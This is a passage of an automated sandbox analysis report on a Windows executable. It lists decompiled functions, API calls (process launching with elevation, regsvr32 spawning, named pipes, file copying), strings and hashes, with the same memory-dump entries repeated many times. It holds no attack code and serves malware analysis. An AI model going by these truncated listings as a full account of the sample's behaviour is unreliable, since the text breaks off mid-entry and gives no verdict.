                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeTask
                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                    • API String ID: 734271698-544719455
                                                                                    • Opcode ID: d362a8e580703c39958d1ab9fec0a02ec5da2bad2a648030e91cff165734e93c
                                                                                    • Instruction ID: dd5fc3daa821dda1b6518f9a5080d1dcac5ab9c80f6433aa49f69c11db3ec318
                                                                                    • Opcode Fuzzy Hash: d362a8e580703c39958d1ab9fec0a02ec5da2bad2a648030e91cff165734e93c
                                                                                    • Instruction Fuzzy Hash: 7A8167346002459BDB10EFE4DC46BAE7BA7EB84704F60542AE400B7792CEB8AD55CF66
                                                                                    Function 0063DDA4 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0063DBC0: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DBEC
                                                                                      • Part of subcall function 0063DBC0: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC05
                                                                                      • Part of subcall function 0063DBC0: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC2F
                                                                                      • Part of subcall function 0063DBC0: CloseHandle.KERNEL32(00000000), ref: 0063DC4D
                                                                                      • Part of subcall function 0063DCD0: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,0063DD61,?,00000097,?,?,0063DDDB,00000000,0063DEF3,?,?,00000001), ref: 0063DCFF
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0063DE2B
                                                                                    • GetLastError.KERNEL32(00000000,0063DEF3,?,?,00000001), ref: 0063DE34
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000004FF,00000000,0063DED1,?,00000000,0063DEF3,?,?,00000001), ref: 0063DE81
                                                                                    • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0063DEA7
                                                                                    • CloseHandle.KERNEL32(00000000,0063DED8,00000000,00000000,000000FF,000004FF,00000000,0063DED1,?,00000000,0063DEF3,?,?,00000001), ref: 0063DECB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                                                    • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                    • API String ID: 254331816-221126205
                                                                                    • Opcode ID: 34014370f5579deeee9a70eab962f15452e20141bfd9a2655e6417c1dd94800e
                                                                                    • Instruction ID: 19f62c8c6b26142c15b7ccd5ce8ac2d9ded865074aa3ecb0be12b35c3f976091
                                                                                    • Opcode Fuzzy Hash: 34014370f5579deeee9a70eab962f15452e20141bfd9a2655e6417c1dd94800e
                                                                                    • Instruction Fuzzy Hash: 69317671E002099FDB10EFA9E8826EDBAB9FF44704F50057DF514E7391DB7499408B95
                                                                                    Function 0061AD2C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(?), ref: 0061AD63
                                                                                    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 0061AD7F
                                                                                    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 0061AD8D
                                                                                    • GetExitCodeProcess.KERNEL32(?), ref: 0061AD9E
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0061ADE5
                                                                                    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0061AE01
                                                                                    Strings
                                                                                    • Helper isn't responding; killing it., xrefs: 0061AD6F
                                                                                    • Helper process exited, but failed to get exit code., xrefs: 0061ADD7
                                                                                    • Helper process exited with failure code: 0x%x, xrefs: 0061ADCB
                                                                                    • Stopping 64-bit helper process. (PID: %u), xrefs: 0061AD55
                                                                                    • Helper process exited., xrefs: 0061ADAD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                    • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                    • API String ID: 3355656108-1243109208
                                                                                    • Opcode ID: c9807878450f3555804f3481b699adbde9aaaeedd93afa765d6bdd2e8624556d
                                                                                    • Instruction ID: 798cb82454b907f4610273c7cefa33f3cc1412bd95dfbe18a7574247b18f10f4
                                                                                    • Opcode Fuzzy Hash: c9807878450f3555804f3481b699adbde9aaaeedd93afa765d6bdd2e8624556d
                                                                                    • Instruction Fuzzy Hash: EF21AF706457409AC720EBB9D5417CBBAD69F19300F088D2DF19ACB692D7B4E8C09753
                                                                                    Function 0064ED7C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 145fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005F89FC: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AE7
                                                                                      • Part of subcall function 005F89FC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AF7
                                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0064EF6A), ref: 0064EDFF
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,0064EF6A), ref: 0064EE26
                                                                                    • SetWindowLongW.USER32(?,000000FC,0064E478), ref: 0064EE60
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33,?,?,000000FC,0064E478,00000000,00400000,00000000), ref: 0064EE95
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33), ref: 0064EF09
                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33,?,?,000000FC,0064E478,00000000), ref: 0064EF17
                                                                                      • Part of subcall function 005F8EF4: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F8FDA
                                                                                    • DestroyWindow.USER32(?,0064EF3A,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33,?,?,000000FC,0064E478,00000000,00400000), ref: 0064EF2D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                    • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                    • API String ID: 1779715363-2312673372
                                                                                    • Opcode ID: 77f6f6f6fb1eb5ada4cbe5229a27d75d8458d2c8502fe412c91970d5af7348ff
                                                                                    • Instruction ID: cb016fcbe83d026b746195098022f91b3a08dbab4975f128bac4cf3c8a8463a3
                                                                                    • Opcode Fuzzy Hash: 77f6f6f6fb1eb5ada4cbe5229a27d75d8458d2c8502fe412c91970d5af7348ff
                                                                                    • Instruction Fuzzy Hash: 04416D70A40208AFDB40EFB8DC52AEEBBF9FB09714F51446AF500F7691E6759E008B64
                                                                                    Function 0061AFDC Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124pipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,0061B1BF,?,00000000,0061B21A,?,?,?,00000000), ref: 0061B039
                                                                                    • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,?,?,00000000,0061B154,?,00000000,000000FF,00000000,00000000,00000000,0061B1BF), ref: 0061B096
                                                                                    • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,?,?,00000000,0061B154,?,00000000,000000FF,00000000,00000000,00000000,0061B1BF), ref: 0061B0A3
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000004FF,?,?,-00000020,0000000C,-00004034,00000014,?,?,00000000,0061B154), ref: 0061B0EF
                                                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,0061B12D,?,00000000), ref: 0061B119
                                                                                    • GetLastError.KERNEL32(?,?,00000000,000000FF,0061B12D,?,00000000), ref: 0061B120
                                                                                      • Part of subcall function 005F84D8: GetLastError.KERNEL32(00000000,005F91EE,00000005,00000000,005F9216,?,?,0066978C,?,00000000,00000000,00000000,?,00650A7F,00000000,00650A9A), ref: 005F84DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                    • String ID: CreateEvent$TransactNamedPipe
                                                                                    • API String ID: 2182916169-3012584893
                                                                                    • Opcode ID: f3f6691c1874f446a7c7284f1b6927ee4e9325dc9b34836dbe96d81c1e2aff7b
                                                                                    • Instruction ID: d0b5e641d23b1beaa1296b08846350201fa2eda204b4eae0268dfb10b8facce3
                                                                                    • Opcode Fuzzy Hash: f3f6691c1874f446a7c7284f1b6927ee4e9325dc9b34836dbe96d81c1e2aff7b
                                                                                    • Instruction Fuzzy Hash: 03418E70A00208AFDB01DF99CD91EEEBBB9FB0D314F1541A5FA14E7391D7749A90CA68
                                                                                    Function 005B155C Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005B1656,?,00000000), ref: 005B1583
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005B1656,?,00000000), ref: 005B15D6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                    • API String ID: 4190037839-2401316094
                                                                                    • Opcode ID: efbe6b4b6ec2bc001232fc299448c635db1c352edd7f61c9ee6d360b2af771fb
                                                                                    • Instruction ID: f3b80c1a87da7667449a85c8543438c8ab4114b066e130539604926b1af64128
                                                                                    • Opcode Fuzzy Hash: efbe6b4b6ec2bc001232fc299448c635db1c352edd7f61c9ee6d360b2af771fb
                                                                                    • Instruction Fuzzy Hash: C7219634A40604ABDB50EBB5CD66ADE7BE8FB84340FA04475E501E3581DB74BE408B58
                                                                                    Function 00407104 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00407119
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040711F
                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,005B1257,GetLogicalProcessorInformation), ref: 00407132
                                                                                    • GetLastError.KERNEL32(00000000,005B1257,GetLogicalProcessorInformation), ref: 0040713B
                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,005B1257,00000000,004071B2,?,00000000,005B1257,GetLogicalProcessorInformation), ref: 00407166
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                                                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                                    • API String ID: 1184211438-79381301
                                                                                    • Opcode ID: b2a0f765048d362bf3b63640f3b9e4d4cc1584ec48073b734667f4f9289056ab
                                                                                    • Instruction ID: 2a2551bed56c130c8612e6e6611bb7f0169533bd52abfaf2f231836d318f311a
                                                                                    • Opcode Fuzzy Hash: b2a0f765048d362bf3b63640f3b9e4d4cc1584ec48073b734667f4f9289056ab
                                                                                    • Instruction Fuzzy Hash: 99114571D08204BADB10EFA5D84576EBBF8EB44705F1481BBE914B73C1D67CAA808B5A
                                                                                    Function 0040ECE1 Relevance: 13.8, APIs: 9, Instructions: 257COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040ED98
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: 92cc54864dd0bbfb11f1611543af708f5326443a752958f50f1db9ea9fa0d6e6
                                                                                    • Instruction ID: f27d7ef7acb61dd46234c6ac8536030262216957dd27a0a5aa9c93a8a5e03d54
                                                                                    • Opcode Fuzzy Hash: 92cc54864dd0bbfb11f1611543af708f5326443a752958f50f1db9ea9fa0d6e6
                                                                                    • Instruction Fuzzy Hash: 6EA17E75900209EFDB24DFA5D880BAEB7B5BF58300F10893AE505B73C0D7B8A945CB94
                                                                                    Function 00619BC0 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 124COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005B09C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005B09D7
                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00619D70,?, /s ",0066978C,regsvr32.exe",?,00619D70), ref: 00619CDE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseDirectoryHandleSystem
                                                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                    • API String ID: 2051275411-1862435767
                                                                                    • Opcode ID: bb828082893d3c3d641e3fdd4af0eaaf4cc23e92c20017eec766e67e36a9a3d6
                                                                                    • Instruction ID: 91a7d65596da60d3ab410b317687a4738a38aed02517376cad794b957d245f8b
                                                                                    • Opcode Fuzzy Hash: bb828082893d3c3d641e3fdd4af0eaaf4cc23e92c20017eec766e67e36a9a3d6
                                                                                    • Instruction Fuzzy Hash: A5413F70E0024C9BDB14EFE5D892ADDBBBAAF49304F64407EE504B7282D7746E44CB65
                                                                                    Function 0040430C Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,?,00000000,02683360,0040763A,?,00000000,02683360,004072DD,00000000,00000220,0042715C,?,004271AA,005B1257,00000000), ref: 004043A2
                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,00000000,02683360,0040763A,?,00000000,02683360,004072DD,00000000,00000220,0042715C,?,004271AA,005B1257), ref: 004043BC
                                                                                    Memory Dump Source
